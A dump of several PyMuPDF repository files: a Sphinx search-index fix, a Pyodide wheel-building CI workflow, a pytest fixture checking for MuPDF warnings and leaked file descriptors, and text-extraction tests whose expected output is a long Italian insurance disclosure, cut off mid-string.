app.connect("html-page-context", html_page_context)
| 3,164 | Python | .py | 84 | 31.607143 | 75 | 0.689172 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,323 | searchrepair.py | pymupdf_PyMuPDF/docs/extensions/searchrepair.py | import os
def modify_search_index(app, exception):
if exception is None: # build succeeded
filename = os.path.join(app.outdir, "searchindex.js")
if os.path.exists(filename):
searchfile = open(filename)
data1 = searchfile.read()
searchfile.close()
p1 = data1.find("filenames:[")
p2 = data1.find("]", p1)
s = data1[p1:p2].replace(".txt", "")
data2 = data1[:p1]
data2 += s
data2 += data1[p2:]
searchfile = open(filename, "w")
searchfile.write(data2)
searchfile.close()
def setup(app):
app.connect("build-finished", modify_search_index)
| 729 | Python | .py | 19 | 27.105263 | 62 | 0.542735 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,324 | test_pyodide.yml | pymupdf_PyMuPDF/.github/workflows/test_pyodide.yml | name: Build Pyodide wheel
on:
workflow_dispatch:
inputs:
PYMUPDF_SETUP_MUPDF_BUILD:
description: 'Value for PYMUPDF_SETUP_MUPDF_BUILD, e.g.: git:--branch master https://github.com/ArtifexSoftware/mupdf.git'
type: string
#default: 'git:--branch master https://github.com/ArtifexSoftware/mupdf.git'
default: '-'
PYMUPDF_SETUP_PY_LIMITED_API:
type: string
default: '1'
schedule:
- cron: '13 5 * * *'
jobs:
build_pyodide:
name: Build pyodide wheel
runs-on: ubuntu-latest
strategy:
matrix:
# 2023-12-22: Python-3.12 is known to fail, due to setuptools trying to
# import distutils.
python-version: ["3.11"]
# Avoid cancelling of all runs after a single failure.
fail-fast: false
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: ${{ matrix.python-version }}
- name: build_pyodide_wheel
env:
inputs_sdist: 0
inputs_PYMUPDF_SETUP_MUPDF_BUILD: ${{inputs.PYMUPDF_SETUP_MUPDF_BUILD}}
PYMUPDF_SETUP_PY_LIMITED_API: ${{inputs.PYMUPDF_SETUP_PY_LIMITED_API}}
inputs_wheels_default: 0
inputs_wheels_linux_pyodide: 1
run:
python scripts/gh_release.py build
# Upload generated wheels, to be accessible from github Actions page.
#
- uses: actions/upload-artifact@v3
with:
path: ./wheelhouse/*.whl
| 1,546 | Python | .py | 44 | 26.681818 | 132 | 0.622962 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,325 | conftest.py | pymupdf_PyMuPDF/tests/conftest.py | import os
import platform
import pymupdf
import pytest
@pytest.fixture(autouse=True)
def wrap(*args, **kwargs):
'''
Check that tests return with empty MuPDF warnings buffer. For example this
detects failure to call fz_close_output() before fz_drop_output(), which
(as of 2024-4-12) generates a warning from MuPDF.
As of 2024-09-12 we also detect whether tests leave fds open; but for now
do not fail tests, because many tests need fixing.
'''
wt = pymupdf.TOOLS.mupdf_warnings()
assert not wt, f'{wt=}'
assert not pymupdf.TOOLS.set_small_glyph_heights()
next_fd_before = os.open(__file__, os.O_RDONLY)
os.close(next_fd_before)
if platform.system() == 'Linux':
# Gather detailed information about leaked fds.
def get_fds():
import subprocess
path = 'PyMuPDF-linx-fds'
path_l = 'PyMuPDF-linx-fds-l'
command = f'ls /proc/{os.getpid()}/fd > {path}'
command_l = f'ls -l /proc/{os.getpid()}/fd > {path_l}'
subprocess.run(command, shell=1)
subprocess.run(command_l, shell=1)
with open(path) as f:
ret = f.read()
ret = ret.replace('\n', ' ')
with open(path_l) as f:
ret_l = f.read()
return ret, ret_l
open_fds_before, open_fds_before_l = get_fds()
pymupdf._log_items_clear()
pymupdf._log_items_active(True)
# Run the test.
rep = yield
# Test has run; check it did not create any MuPDF warnings etc.
wt = pymupdf.TOOLS.mupdf_warnings()
if not hasattr(pymupdf, 'mupdf'):
print(f'Not checking mupdf_warnings on classic.')
else:
assert not wt, f'Warnings text not empty: {wt=}'
assert not pymupdf.TOOLS.set_small_glyph_heights()
log_items = pymupdf._log_items()
assert not log_items, f'log() was called; {len(log_items)=}.'
if platform.system() == 'Linux':
# Show detailed information about leaked fds.
open_fds_after, open_fds_after_l = get_fds()
if open_fds_after != open_fds_before:
import textwrap
print(f'Test has changed process fds:')
print(f' {open_fds_before=}')
print(f' {open_fds_after=}')
print(f'open_fds_before_l:')
print(textwrap.indent(open_fds_before_l, ' '))
print(f'open_fds_after_l:')
print(textwrap.indent(open_fds_after_l, ' '))
#assert 0
next_fd_after = os.open(__file__, os.O_RDONLY)
os.close(next_fd_after)
if next_fd_after != next_fd_before:
print(f'Test has leaked fds, {next_fd_before=} {next_fd_after=}. {args=} {kwargs=}.')
#assert 0, f'Test has leaked fds, {next_fd_before=} {next_fd_after=}. {args=} {kwargs=}.'
| 2,861 | Python | .py | 66 | 34.530303 | 97 | 0.601383 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,326 | test_textextract.py | pymupdf_PyMuPDF/tests/test_textextract.py | """
Extract page text in various formats.
No checks performed - just contribute to code coverage.
"""
import os
import sys
import pymupdf
pymupdfdir = os.path.abspath(f'{__file__}/../..')
scriptdir = f'{pymupdfdir}/tests'
filename = os.path.join(scriptdir, "resources", "symbol-list.pdf")
def test_extract1():
doc = pymupdf.open(filename)
page = doc[0]
text = page.get_text("text")
blocks = page.get_text("blocks")
words = page.get_text("words")
d1 = page.get_text("dict")
d2 = page.get_text("json")
d3 = page.get_text("rawdict")
d3 = page.get_text("rawjson")
text = page.get_text("html")
text = page.get_text("xhtml")
text = page.get_text("xml")
rects = pymupdf.get_highlight_selection(page, start=page.rect.tl, stop=page.rect.br)
text = pymupdf.ConversionHeader("xml")
text = pymupdf.ConversionTrailer("xml")
def _test_extract2():
import sys
import time
path = f'{scriptdir}/../../PyMuPDF-performance/adobe.pdf'
if not os.path.exists(path):
print(f'test_extract2(): not running because does not exist: {path}')
return
doc = pymupdf.open( path)
for opt in (
'dict',
'dict2',
'text',
'blocks',
'words',
'html',
'xhtml',
'xml',
'json',
'rawdict',
'rawjson',
):
for flags in None, pymupdf.TEXTFLAGS_TEXT:
t0 = time.time()
for page in doc:
page.get_text(opt, flags=flags)
t = time.time() - t0
print(f't={t:.02f}: opt={opt} flags={flags}')
sys.stdout.flush()
def _test_extract3():
import sys
import time
path = f'{scriptdir}/../../PyMuPDF-performance/adobe.pdf'
if not os.path.exists(path):
print(f'test_extract3(): not running because does not exist: {path}')
return
doc = pymupdf.open( path)
t0 = time.time()
for page in doc:
page.get_text('json')
t = time.time() - t0
print(f't={t}')
sys.stdout.flush()
def test_extract4():
'''
Rebased-specific.
'''
if not hasattr(pymupdf, 'mupdf'):
return
path = f'{pymupdfdir}/tests/resources/2.pdf'
document = pymupdf.open(path)
page = document[4]
out = 'test_stext.html'
text = page.get_text('html')
with open(out, 'w') as f:
f.write(text)
print(f'Have written to: {out}')
out = 'test_extract.html'
writer = pymupdf.mupdf.FzDocumentWriter(
out,
'html',
pymupdf.mupdf.FzDocumentWriter.OutputType_DOCX,
)
device = pymupdf.mupdf.fz_begin_page(writer, pymupdf.mupdf.fz_bound_page(page))
pymupdf.mupdf.fz_run_page(page, device, pymupdf.mupdf.FzMatrix(), pymupdf.mupdf.FzCookie())
pymupdf.mupdf.fz_end_page(writer)
pymupdf.mupdf.fz_close_document_writer(writer)
print(f'Have written to: {out}')
if pymupdf.mupdf_version_tuple >= (1, 23, 4):
def get_text(page, space_guess):
buffer_ = pymupdf.mupdf.FzBuffer( 10)
out = pymupdf.mupdf.FzOutput( buffer_)
writer = pymupdf.mupdf.FzDocumentWriter(
out,
'text,space-guess={space_guess}',
pymupdf.mupdf.FzDocumentWriter.OutputType_DOCX,
)
device = pymupdf.mupdf.fz_begin_page(writer, pymupdf.mupdf.fz_bound_page(page))
pymupdf.mupdf.fz_run_page(page, device, pymupdf.mupdf.FzMatrix(), pymupdf.mupdf.FzCookie())
pymupdf.mupdf.fz_end_page(writer)
pymupdf.mupdf.fz_close_document_writer(writer)
text = buffer_.fz_buffer_extract()
text = text.decode('utf8')
n = text.count(' ')
print(f'{space_guess=}: {n=}')
return text, n
page = document[4]
text0, n0 = get_text(page, 0)
text1, n1 = get_text(page, 0.5)
text2, n2 = get_text(page, 0.001)
text2, n2 = get_text(page, 0.1)
text2, n2 = get_text(page, 0.3)
text2, n2 = get_text(page, 0.9)
text2, n2 = get_text(page, 5.9)
assert text1 == text0
def test_2954():
'''
Check handling of unknown unicode characters, issue #2954, fixed in
mupdf-1.23.9 with addition of FZ_STEXT_USE_CID_FOR_UNKNOWN_UNICODE.
'''
path = os.path.abspath(f'{__file__}/../../tests/resources/test_2954.pdf')
flags0 = (0
| pymupdf.TEXT_PRESERVE_WHITESPACE
| pymupdf.TEXT_PRESERVE_LIGATURES
| pymupdf.TEXT_MEDIABOX_CLIP
)
document = pymupdf.Document(path)
expected_good = (
"IT-204-IP (2021) Page 3 of 5\nNYPA2514 12/06/21\nPartner's share of \n"
" modifications (see instructions)\n20\n State additions\nNumber\n"
"A ' Total amount\nB '\n State allocated amount\n"
"EA '\n20a\nEA '\n20b\nEA '\n20c\nEA '\n20d\nEA '\n20e\nEA '\n20f\n"
"Total addition modifications (total of column A, lines 20a through 20f)\n"
". . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
"21\n21\n22\n State subtractions\n"
"Number\nA ' Total amount\nB '\n State allocated amount\n"
"ES '\n22a\nES '\n22b\nES '\n22c\nES '\n22d\nES '\n22e\nES '\n22f\n23\n23\n"
"Total subtraction modifications (total of column A, lines 22a through 22f). . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
"Additions to itemized deductions\n24\nAmount\n"
"Letter\n"
"24a\n24b\n24c\n24d\n24e\n24f\n"
"Total additions to itemized deductions (add lines 24a through 24f)\n"
". . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
"25\n25\n"
"Subtractions from itemized deductions\n"
"26\nLetter\nAmount\n26a\n26b\n26c\n26d\n26e\n26f\n"
"Total subtractions from itemized deductions (add lines 26a through 26f) . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
"27\n27\n"
"This line intentionally left blank. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \n"
"28\n28\n118003213032\n"
)
def check_good(text):
'''
Returns true if `text` is approximately the same as `expected_good`.
2024-01-09: MuPDF master and 1.23.x give slightly different 'good'
output, differing in a missing newline. So we compare without newlines.
'''
return text.replace('\n', '') == expected_good.replace('\n', '')
n_fffd_good = 0
n_fffd_bad = 749
def get(flags=None):
text = [page.get_text(flags=flags) for page in document]
assert len(text) == 1
text = text[0]
n_fffd = text.count(chr(0xfffd))
if 0:
# This print() fails on Windows with UnicodeEncodeError.
print(f'{flags=} {n_fffd=} {text=}')
return text, n_fffd
text_none, n_fffd_none = get()
text_0, n_fffd_0 = get(flags0)
if pymupdf.mupdf_version_tuple >= (1, 23, 9):
text_1, n_fffd_1 = get(flags0 | pymupdf.TEXT_CID_FOR_UNKNOWN_UNICODE)
assert n_fffd_none == n_fffd_good
assert n_fffd_0 == n_fffd_bad
assert n_fffd_1 == n_fffd_good
assert check_good(text_none)
assert not check_good(text_0)
assert check_good(text_1)
else:
assert n_fffd_none == n_fffd_bad
assert n_fffd_0 == n_fffd_bad
assert not check_good(text_none)
assert not check_good(text_0)
def test_3027():
path = path = f'{pymupdfdir}/tests/resources/2.pdf'
doc = pymupdf.open(path)
page = doc[0]
textpage = page.get_textpage()
pymupdf.utils.get_text(page=page, option="dict", textpage=textpage)["blocks"]
def test_3186():
texts_expected = [
"Assicurazione sulla vita di tipo Unit Linked\nDocumento informativo precontrattuale aggiuntivo\nper i prodotti d\x00investimento assicurativi\n(DIP aggiuntivo IBIP)\nImpresa: AXA MPS Financial DAC \nProdotto: Progetto Protetto New - Global Dividends\nContratto Unit linked (Ramo III)\nData di realizzazione: Aprile 2023\nIl presente documento contiene informazioni aggiuntive e complementari rispetto a quelle presenti nel documento \ncontenente le informazioni chiave per i prodotti di investimento assicurativi (KID) per aiutare il potenziale \ncontraente a capire più nel dettaglio le caratteristiche del prodotto, gli obblighi contrattuali e la situazione \npatrimoniale dell\x00impresa.\nIl Contraente deve prendere visione delle condizioni d\x00assicurazione prima della sottoscrizione del Contratto.\nAXA MPS Financial DAC, Wolfe Tone House, Wolfe Tone Street, Dublin, DO1 HP90, Irlanda; Tel: 00353-1-6439100; \nsito internet: www.axa-mpsfinancial.ie; e-mail: supporto@axa-mpsfinancial.ie;\nAXA MPS Financial DAC, società del Gruppo Assicurativo AXA Italia, iscritta nell\x00Albo delle Imprese di assicurazione \ncon il numero II.00234. \nLa Compagnia mette a disposizione dei clienti i seguenti recapiti per richiedere eventuali informazioni sia in merito alla \nCompagnia sia in relazione al contratto proposto: Tel: 00353-1-6439100; sito internet: www.axa-mpsfinancial.ie; \ne-mail: supporto@axa-mpsfinancial.ie;\nAXA MPS Financial DAC è un\x00impresa di assicurazione di diritto Irlandese, Sede legale 33 Sir John Rogerson's Quay, \nDublino D02 XK09 Irlanda. L\x00Impresa di Assicurazione è stata autorizzata all\x00esercizio dell\x00attività assicurativa con \nprovvedimento n. C33602 emesso dalla Central Bank of Ireland (l\x00Autorità di vigilanza irlandese) in data 14/05/1999 \ned è iscritta in Irlanda presso il Companies Registration Office (registered nr. 293822). \nLa Compagnia opera in Italia esclusivamente in regime di libera prestazione di servizi ai sensi dell\x00art. 24 del D. Lgs. \n07/09/2005, n. 209 e può investire in attivi non consentiti dalla normativa italiana in materia di assicurazione sulla \nvita, ma in conformità con la normativa irlandese di riferimento in quanto soggetta al controllo della Central Bank of \nIreland.\nCon riferimento all\x00ultimo bilancio d\x00esercizio (esercizio 2021) redatto ai sensi dei principi contabili vigenti, il patrimonio \nnetto di AXA MPS Financial DAC ammonta a 139,6 milioni di euro di cui 635 mila euro di capitale sociale interamente \nversato e 138,9 milioni di euro di riserve patrimoniali compreso il risultato di esercizio.\nAl 31 dicembre 2021 il Requisito patrimoniale di solvibilità è pari a 90 milioni di euro (Solvency Capital Requirement, \nSCR). Sulla base delle valutazioni effettuate della Compagnia coerentemente con gli esistenti dettami regolamentari, il \nRequisito patrimoniale minimo al 31 dicembre 2021 ammonta a 40 milioni di euro (Minimum Capital Requirement, \nMCR).\nL'indice di solvibilità di AXA MPS Financial DAC, ovvero l'indice che rappresenta il rapporto tra l'ammontare del margine \ndi solvibilità disponibile e l'ammontare del margine di solvibilità richiesto dalla normativa vigente, e relativo all'ultimo \nbilancio approvato, è pari al 304% (solvency ratio). L'importo dei fondi propri ammissibili a copertura dei requisiti \npatrimoniali è pari a 276 milioni di euro (Eligible Own Funds, EOF).\nPer informazioni patrimoniali sulla società è possibile consultare il sito: www.axa-mpsfinancial.ie/chi-siamo\nSi rinvia alla relazione sulla solvibilità e sulla condizione finanziaria dell\x00impresa (SFCR) disponibile sul sito internet \ndella Compagnia al seguente link www.axa-mpsfinancial.ie/comunicazioni \nAl contratto si applica la legge italiana\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 1 di 9\n",
"Quali sono le prestazioni?\nIl contratto prevede le seguenti prestazioni:\na)Prestazioni in caso di vita dell'assicurato\nPrestazione in caso di Riscatto Totale e parziale\nA condizione che siano trascorsi almeno 30 giorni dalla Data di Decorrenza (conclusione del Contratto) e fino all\x00ultimo \nGiorno Lavorativo della terzultima settimana precedente la data di scadenza, il Contraente può riscuotere, interamente \no parzialmente, il Valore di Riscatto. In caso di Riscatto totale, la liquidazione del Valore di Riscatto pone fine al \nContratto con effetto dalla data di ricezione della richiesta.\nIl Contraente ha inoltre la facoltà di esercitare parzialmente il diritto di Riscatto, nella misura minima di 500,00 euro, \nda esercitarsi con le stesse modalità previste per il Riscatto totale. In questo caso, il Contratto rimane in vigore per \nl\x00ammontare residuo, a condizione che il Controvalore delle Quote residue del Contratto non sia inferiore a 1.000,00 \neuro.\nb) Prestazione a Scadenza\nAlla data di scadenza, sempre che l\x00Assicurato sia in vita, l\x00Impresa di Assicurazione corrisponderà agli aventi diritto un \nammontare risultante dal Controvalore delle Quote collegate al Contratto alla scadenza, calcolato come prodotto tra il \nValore Unitario della Quota (rilevato in corrispondenza della data di scadenza) e il numero delle Quote attribuite al \nContratto alla medesima data.\nc) Prestazione in corso di Contratto\nPurché l\x00assicurato sia in vita, nel corso della durata del Contratto, il Fondo Interno mira alla corresponsione di due \nPrestazioni Periodiche. Le prestazioni saranno pari all\x00ammontare risultante dalla moltiplicazione tra il numero di Quote \nassegnate al Contratto il primo giorno Lavorativo della settimana successiva alla Data di Riferimento e 2,50% del \nValore Unitario della Quota registrato alla Data di istituzione del Fondo Interno.\nLe prestazioni verranno liquidate entro trenta giorni dalle Date di Riferimento.\nData di Riferimento\n 1° Prestazione Periodica\n24/04/2024\n 2° Prestazione Periodica\n23/04/2025\nLa corresponsione delle Prestazioni Periodiche non è collegata alla performance positiva o ai ricavi incassati dal Fondo \nInterno, pertanto, la corresponsione potrebbe comportare una riduzione del Controvalore delle Quote senza comportare \nalcuna riduzione del numero di Quote assegnate al Contratto.\nd) Prestazione assicurativa principale in caso di decesso dell'Assicurato\nIn caso di decesso dell\x00Assicurato nel corso della durata contrattuale, è previsto il pagamento ai Beneficiari di un \nimporto pari al Controvalore delle Quote attribuite al Contratto, calcolato come prodotto tra il Valore Unitario della \nQuota rilevato alla Data di Valorizzazione della settimana successiva alla data in cui la notifica di decesso \ndell\x00Assicurato perviene all\x00Impresa di Assicurazione e il numero delle Quote attribuite al Contratto alla medesima data, \nmaggiorato di una percentuale pari allo 0,1%.\nQualora il capitale così determinato fosse inferiore al Premio pagato, sarà liquidato un ulteriore importo pari alla \ndifferenza tra il Premio pagato, al netto della parte di Premio riferita a eventuali Riscatti parziali e l\x00importo caso morte \ncome sopra determinato. Tale importo non potrà essere in ogni caso superiore al 5% del Premio pagato.\nOpzioni contrattuali\nIl Contratto non prevede opzioni contrattuali.\nFondi Assicurativi\nLe prestazioni di cui sopra sono collegate, in base all\x00allocazione del premio come descritto alla sezione \x01Quando e \ncome devo pagare?\x02, al valore delle quote del Fondo Interno denominato PP27 Global Dividends.\nil Fondo interno mira al raggiungimento di un Obiettivo di Protezione del Valore Unitario di Quota, tramite il \nconseguimento di un Valore Unitario di Quota a scadenza almeno pari al 100% del valore di quota registrato alla Data \ndi istituzione dal Fondo Interno.\nIl regolamento di gestione del Fondo Interno è disponibile sul sito dell\x00Impresa di Assicurazione \nwww.axa-mpsfinancial.ie dove puo essere acquisito su supporto duraturo.\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 2 di 9\n",
'Che cosa NON è assicurato\nRischi esclusi\nIl rischio di decesso dell\x00Assicurato è coperto qualunque sia la causa, senza limiti territoriali e senza \ntenere conto dei cambiamenti di professione dell\x00Assicurato, ad eccezione dei seguenti casi:\n\x03 il decesso, entro i primi sette anni dalla data di decorrenza del Contratto, dovuto alla sindrome da \nimmunodeficienza acquisita (AIDS) o ad altra patologia ad essa associata;\n\x03 dolo del Contraente o del Beneficiario;\n\x03 partecipazione attiva dell\x00Assicurato a delitti dolosi;\n\x03 partecipazione dell\x00Assicurato a fatti di guerra, salvo che non derivi da obblighi verso lo Stato \nItaliano: in questo caso la garanzia può essere prestata su richiesta del Contraente, alle condizioni \nstabilite dal competente Ministero;\n\x03 incidente di volo, se l\x00Assicurato viaggia a bordo di un aeromobile non autorizzato al volo o con \npilota non titolare di brevetto idoneo e, in ogni caso, se viaggia in qualità di membro \ndell\x00equipaggio;\n\x03 suicidio, se avviene nei primi due anni dalla Data di Decorrenza del Contratto\nCi sono limiti di copertura?\nNon vi sono ulteriori informazioni rispetto al contenuto del KID.\nChe obblighi ho? Quali obblighi ha l\x00Impresa?\nCosa fare in caso \ndi evento?\nDenuncia\nCon riferimento alla liquidazione delle prestazioni dedotte in Contratto, il Contraente o, se del caso, \nil Beneficiario e il Referente Terzo, sono tenuti a recarsi presso la sede dell\x00intermediario presso il \nquale il Contratto è stato sottoscritto ovvero a inviare preventivamente, a mezzo di lettera \nraccomandata con avviso di ricevimento al seguente recapito:\n\x03 AXA MPS Financial DAC\n\x03 Wolfe Tone House, Wolfe Tone Street,\n\x03 Dublin, DO1 HP90 - Ireland\n\x03 Numero Verde: 800.231.187\n\x03 email: supporto@axa-mpsfinancial.ie\ni documenti di seguito elencati per ciascuna prestazione, al fine di consentire all\x00Impresa di \nAssicurazione di verificare l\x00effettiva esistenza dell\x00obbligo di pagamento.\nin caso di Riscatto totale, il Contraente deve inviare all\x00Impresa di Assicurazione:\n\x04 la richiesta di Riscatto totale firmata dal Contraente, indicando il conto corrente su cui il \npagamento deve essere effettuato. Nel caso il conto corrente sia intestato a persona diversa dal \nContraente o dai beneficiari o sia cointestato, il Contraente deve fornire anche I documenti del \ncointestatario e specificare la relazione con il terzo il cui conto viene indicato.\n\x04 copia di un valido documento di identità del Contraente o di un documento attestante i poteri di \nlegale rappresentante, nel caso in cui il Contraente sia una persona giuridica;\nin caso di Riscatto parziale, il Contraente deve inviare all\x00Impresa di Assicurazione:\n\x04 la richiesta di Riscatto parziale firmata dal Contraente, contenente l\x00indicazione dei Fondi \nInterni/OICR che intende riscattare e il relativo ammontare non ché l\x00indicazione del conto corrente \nbancario sul quale effettuare il pagamento;\n\x04 copia di un valido documento di identità del Contraente, o di un documento attestante i poteri di \nlegale rappresentante, nel caso in cui il Contraente sia una persona giuridica.\nIn caso di richiesta di Riscatto totale o parziale non corredata dalla sopra elencata documentazione, \nl\x00Impresa di Assicurazione effettuerà il disinvestimento delle Quote collegate al Contratto alla data \ndi ricezione della relativa richiesta. L\x00Impresa di Assicurazione provvederà tuttavia alla liquidazione \ndelle somme unicamente al momento di ricezione della documentazione mancante, prive degli \neventuali interessi che dovessero maturare;\nIn caso di decesso dell\x00Assicurato, il Beneficiario/i o il Referente Terzo deve inviare all\x00Impresa di \nAssicurazione:\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 3 di 9\n',
'\x04 la richiesta di pagamento sottoscritta da tutti i Beneficiari, con l\x00indicazione del conto corrente \nbancario sul quale effettuare il pagamento; Nel caso il conto corrente sia intestato a persona \ndiversa dal Contraente o dai beneficiari o sia cointestato, il Contraente deve fornire anche I \ndocumenti del cointestatario e specificare la relazione con il terzo il cui conto viene indicato.\n\x04 copia di un valido documento d\x00identità dei Beneficiari o di un documento attestante i poteri di \nlegale rappresentante, nel caso in cui il Beneficiario sia una persona giuridica;\n\x04 il certificato di morte dell\x00Assicurato;\n\x04 la relazione medica sulle cause del decesso;\n\x04 copia autenticata del testamento accompagnato da dichiarazione sostitutiva di atto di notorietà \ncon l\x00indicazione (i) della circostanza che il testamento è l\x00ultimo da considerarsi valido e non è \nstato impugnato e (ii) degli eredi testamentari, le relative età e capacità\ndi agire;\n\x04 in assenza di testamento, atto notorio (o dichiarazione sostitutiva di atto di notorietà) attestante \nche il decesso è avvenuto senza lasciare testamento e che non vi sono altri soggetti cui la legge \nriconosce diritti o quote di eredità;\n\x04 decreto del Giudice Tutelare nel caso di Beneficiari di minore età, con l\x00indicazione della persona \ndesignata alla riscossione;\n\x04 copia del Questionario KYC.\nPrescrizione: Alla data di redazione del presente documento, i diritti dei beneficiari dei contratti di \nassicurazione sulla vita si prescrivono nel termine di dieci anni dal giorno in cui si è verificato il fatto \nsu cui il diritto si fonda. Decorso tale termine e senza che la Compagnia abbia ricevuto alcuna \ncomunicazione e/o disposizione, gli importi derivanti dal contratto saranno devoluti al Fondo \ncostitutivo presso il Ministero dell\x00Economia e delle Finanze \x01depositi dormienti\x02.\nErogazione della prestazione\nL\x00Impresa di Assicurazione esegue il pagamento entro trenta giorni dal ricevimento della \ndocumentazione completa all\x00indirizzo sopra indicato.\n \nLe dichiarazioni del Contraente, e dell\x00Assicurato se diverso dal Contraente, devono essere esatte e \nveritiere. In caso di dichiarazioni inesatte o reticenti relative a circostanze tali che l\x00Impresa di \nAssicurazione non avrebbe dato il suo consenso, non lo avrebbe dato alle medesime condizioni se \navesse conosciuto il vero stato delle cose, l\x00Impresa di Assicurazione ha diritto a:\na) in caso di dolo o colpa grave:\n\x04 impugnare il Contratto dichiarando al Contraente di voler esercitare tale diritto entro tre mesi dal \ngiorno in cui ha conosciuto l\x00inesattezza della dichiarazione o le reticenze;\n\x04 trattenere il Premio relativo al periodo di assicurazione in corso al momento dell\x00impugnazione e, \nin ogni caso, il Premio corrispondente al primo anno;\n\x04 restituire, in caso di decesso dell\x00Assicurato, solo il Controvalore delle Quote acquisite al \nmomento del decesso, se l\x00evento si verifica prima che sia decorso il termine dianzi indicato per \nl\x00impugnazione;\nb) ove non sussista dolo o colpa grave:\n\x04 recedere dal Contratto, mediante dichiarazione da farsi al Contraente entro tre mesi dal giorno in \ncui ha conosciuto l\x00inesattezza della dichiarazione o le reticenze;\n\x04 se il decesso si verifica prima che l\x00inesattezza della dichiarazione o la reticenza sia conosciuta \ndall\x00Impresa di Assicurazione, o prima che l\x00Impresa abbia dichiarato di recedere dal Contratto, di \nridurre la somma dovuta in proporzione alla differenza tra il Premio convenuto e quello che sarebbe \nstato applicato se si fosse conosciuto il vero stato delle cose.\nIl Contraente è tenuto a inoltrare per iscritto alla Compagnia (posta ordinaria e mail) eventuali \ncomunicazioni inerenti:\n-modifiche dell\x00indirizzo presso il quale intende ricevere le comunicazioni relative al contratto;\n-variazione della residenza Europea nel corso della durata del contratto, presso altro Paese \nmembro della Unione Europea;\n-variazione degli estremi di conto corrente bancario.\nIn tal caso è necessario inoltrare la richiesta attraverso l\x00invio del modulo del mandato, compilato e \nsottoscritto dal contraente, reperibile nella sezione \x01comunicazioni\x02 sul sito internet della \ncompagnia all\x00indirizzo www.axa-mpsfinancial.ie\nFATCA (Foreign Account Tax Compliance Act) e CRS (Common Standard Reporting)\nLa normativa denominata rispettivamente FATCA (Foreign Account Tax Compliance Act - \nIntergovernmental Agreement sottoscritto tra Italia e Stati Uniti in data 10 gennaio 2014 e Legge n. \n95 del 18 giugno 2015) e CRS (Common Reporting Standard - Decreto Ministeriale del 28 \ndicembre 2015) impone agli operatori commerciali, al fine di contrastare la frode fiscale e \nl\x00evasione fiscale transfrontaliera, di eseguire la puntuale identificazione della propria clientela al \nfine di determinarne l\x00effettivo status di contribuente estero.\nDichiarazioni \ninesatte o \nreticenti\nDIP aggiuntivo IBIP - Progetto Protetto New - Global Dividends - Pag. 4 di 9\n',
"I dati anagrafici e patrimoniali dei Contraenti identificati come fiscalmente residenti negli USA e/o \nin uno o più Paesi aderenti al CRS, dovranno essere trasmessi all\x00autorità fiscale locale, tramite \nl\x00Agenzia delle Entrate.\nL\x00identificazione avviene in fase di stipula del contratto e deve essere ripetuta in caso di \ncambiamento delle condizioni originarie durante tutta la sua durata, mediante l\x00acquisizione di \nautocertificazione rilasciata dai Contraenti. Ogni contraente è tenuto a comunicare \ntempestivamente eventuali variazioni rispetto a quanto dichiarato o rilevato in fase di sottoscrizione \ndel contratto di assicurazione. La Società si riserva inoltre di verificare i dati raccolti e di richiedere \nulteriori informazioni. In caso di autocertificazione che risulti compilata parzialmente o in maniera \nerrata, nonché in caso di mancata/non corretta comunicazione dei propri dati anagrafici, la società \nqualora abbia rilevato indizi di americanità e/o residenze fiscali estere nelle informazioni in suo \npossesso, assocerà al cliente la condizione di contribuente estero, provvedendo alla comunicazione \ndovuta.\nAntiriciclaggio\nIl Contraente è tenuto a fornire alla Compagnia tutte le informazioni necessarie al fine \ndell\x00assolvimento dell\x00adeguata verifica ai fini antiriciclaggio. Qualora la Compagnia, in ragione \ndella mancata collaborazione del Contraente, non sia in grado di portare a compimento l\x00adeguata \nverifica, la stessa non potrà concludere il Contratto o dovrà porre fine allo stesso. In tali ipotesi le \nsomme dovute al Contraente dovranno essere allo stesso versate mediante bonifico a valere un \nconto corrente intestato al Contraente stesso. In tali ipotesi le disponibilità finanziarie \neventualmente già acquisite dalla Compagnia dovranno essere restituite al Contraente liquidando il \nrelativo importo tramite bonifico bancario su un conto corrente bancario indicato dal Contraente e \nallo stesso intestato.\nIn nessun caso l'Impresa di Assicurazione sarà tenuta a fornire alcuna copertura assicurativa, \nsoddisfare richieste di risarcimento o garantire alcuna indennità in virtù del presente contratto, \nqualora tale copertura, pagamento o indennità possa esporla a divieti, sanzioni economiche o \nrestrizioni ai sensi di Risoluzioni delle Nazioni Unite o sanzioni economiche o commerciali, leggi o \nnorme dell\x00Unione Europea, del Regno Unito o degli Stati Uniti d\x00America, ove applicabili in Italia.\nQuando e come devo pagare?\nPremio\nIl Contratto prevede il pagamento di un Premio Unico il cui ammontare minimo è pari a 2.500,00 \neuro, incrementabile di importo pari o in multiplo di 50,00 euro, da corrispondersi in un\x00unica \nsoluzione prima della conclusione del Contratto.\nNon è prevista la possibilità di effettuare versamenti aggiuntivi successivi.\nIl versamento del Premio Unico può essere effettuato mediante addebito su conto corrente \nbancario, indicato nel Modulo di Proposta, previa autorizzazione del titolare del conto corrente.\nIl pagamento dei Premio Unico può essere eseguito mediante addebito su conto corrente bancario, \nprevia autorizzazione, intestato al Contraente oppure tramite bonifico bancario sul conto corrente \ndell\x00Impresa di Assicurazione.\nRimborso\nIl rimborso del Premio Versato è previsto nel caso in cui il Contraente decida di revocare la proposta \nfinché il contratto non è concluso.\nSconti\nAl verificarsi di condizioni particolari ed eccezionali che potrebbero riguardare \x03 a titolo \nesemplificativo ma non esaustivo \x03 il Contraente e la relativa situazione 